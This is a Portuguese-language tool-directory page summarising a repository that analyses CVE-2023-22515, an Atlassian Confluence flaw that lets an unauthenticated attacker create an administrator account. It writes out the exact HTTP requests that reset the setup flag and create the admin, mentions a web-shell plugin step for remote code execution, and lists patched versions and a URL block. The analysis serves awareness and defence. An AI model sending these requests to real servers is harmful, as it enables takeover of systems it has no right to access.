Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2023-22515-1 — Análise técnica e exploit de prova de conceito para CVE-2023-22515, uma vulnerabilidade crítica de controle de acesso quebrado no Atlassian Confluence permitindo criação de conta de administrador não autenticado e comprometimento do sistema. | Kitploit
Ferramentas/GitHubGitHub/dkq-k/cve-2023-22515-1
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubdkq-k/cve-2023-22515-1

cve-2023-22515-1

Análise técnica e exploit de prova de conceito para CVE-2023-22515, uma vulnerabilidade crítica de controle de acesso quebrado no Atlassian Confluence permitindo criação de conta de administrador não autenticado e comprometimento do sistema.

Ver Repositório
há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2023-22515: Análise Profunda da Vulnerabilidade de Elevação de Privilégios no Confluence

[!IMPORTANT] Alerta de Segurança Urgente: Esta vulnerabilidade tem a pontuação CVSS 10.0 (Crítica), o mais alto nível de risco. Se você estiver usando uma versão afetada, é necessária uma correção imediata.

1. Visão Geral (Overview)

CVE-2023-22515 é uma vulnerabilidade crítica de Broken Access Control (Controle de Acesso Quebrado) encontrada no Atlassian Confluence Data Center e Server. Um atacante, sem autenticação, pode manipular remotamente o estado de configuração do servidor, criar uma conta de administrador e assumir completamente o sistema.

ItemDetalhes
ID da VulnerabilidadeCVE-2023-22515
Nível de RiscoCRÍTICA (CVSS 10.0)
Versões Afetadas8.0.0 ~ 8.5.1 (verificar versões específicas)
Tipo de AtaqueBypass de Autenticação e Elevação de Privilégios

2. Mecanismo de Ataque (Attack Mechanism)

Esta vulnerabilidade é desencadeada quando o atacante, por meio do endpoint /server-info.action, altera o valor de bootstrapStatusProvider.applicationConfig.setupComplete para false.

🔍 Diagrama da Sequência de Ataque

root@kitploit:~
sequenceDiagram
    participant Attacker as 😈 Atacante
    participant Server as 🖥️ Servidor Confluence
    participant Config as ⚙️ Gerenciador de Configuração

    Note over Attacker, Server: Fase 1: Ataque de reinicialização do estado de configuração
    Attacker->>Server: GET /server-info.action?setupComplete=false
    Server->>Config: Desmarca a flag de configuração concluída na memória
    Config-->>Server: Alteração de estado concluída (modo de instalação)
    Server-->>Attacker: HTTP 200/302 OK

    Note over Attacker, Server: Fase 2: Criação de conta de administrador
    Attacker->>Server: POST /setup/setupadministrator.action<br/>(Envia novas informações de administrador)
    Server->>Server: Bypass da verificação de segurança (permitido por estar em modo de instalação)
    Server-->>Attacker: Conta criada com sucesso e login

    Note over Attacker, Server: Fase 3: Assunção do sistema (RCE)
    Attacker->>Server: Upload de plugin malicioso (Web Shell)
    Server-->>Attacker: Obtenção de permissão para execução remota de comandos

[!NOTE] Princípio central: Não se modifica o arquivo de configuração persistente (confluence.cfg.xml), mas sim o estado em tempo de execução na memória, contornando a lógica de controle de acesso.

3. Análise Técnica (Technical Analysis)

Causa Raiz (Root Cause)

Ocorre devido a uma vulnerabilidade de binding de parâmetros no framework XWork2 e à falta de validação de entrada externa no atributo sensível (setupComplete) na classe de ação (ServerInfoAction) do Confluence.

Exemplo de Requisição HTTP

O atacante pode neutralizar o servidor com uma simples requisição HTTP.

1. Requisição de reinicialização da configuração:

root@kitploit:~
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com

2. Requisição de criação de administrador:

root@kitploit:~
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...

4. Reprodução da Vulnerabilidade (PoC & Demo)

O kit de reprodução (cve-2023-22515-repro) fornecido junto com este relatório permite praticar a vulnerabilidade em um ambiente Docker seguro.

🎥 Demo Cinemática

Inclui um script de demonstração que mostra visualmente o processo real de hacking no terminal.

root@kitploit:~
# Comando para executar a demo
bash cinematic_pwn.sh

[!TIP] O script de demonstração realiza o ataque contra um servidor real (localhost:8090), criando uma conta de administrador e tentando o login, mostrando todo o processo de forma automatizada.

5. Mitigação (Mitigation)

✅ Aplicar a Correção Mais Recente (Recomendado)

A solução mais segura é atualizar para as versões corrigidas fornecidas pela Atlassian.

  • Versão 8.3.3 ou superior
  • Versão 8.4.3 ou superior
  • Versão 8.5.2 ou superior

⚠️ Medidas Temporárias de Mitigação

Caso a correção não seja possível, bloqueie o acesso aos seguintes padrões de URL em equipamentos de segurança de rede (WAF, balanceador de carga, etc.):

  • */setup/*

6. Conclusão (Conclusion)

O CVE-2023-22515 é uma vulnerabilidade crítica com baixíssima dificuldade de ataque e que permite a assunção total do sistema. Os responsáveis pela segurança devem aplicar a correção imediatamente e monitorar se houve alguma violação.


Data de criação: 2026-01-16 | Autor: Antigravity Security Analysis Team

Baixar ferramenta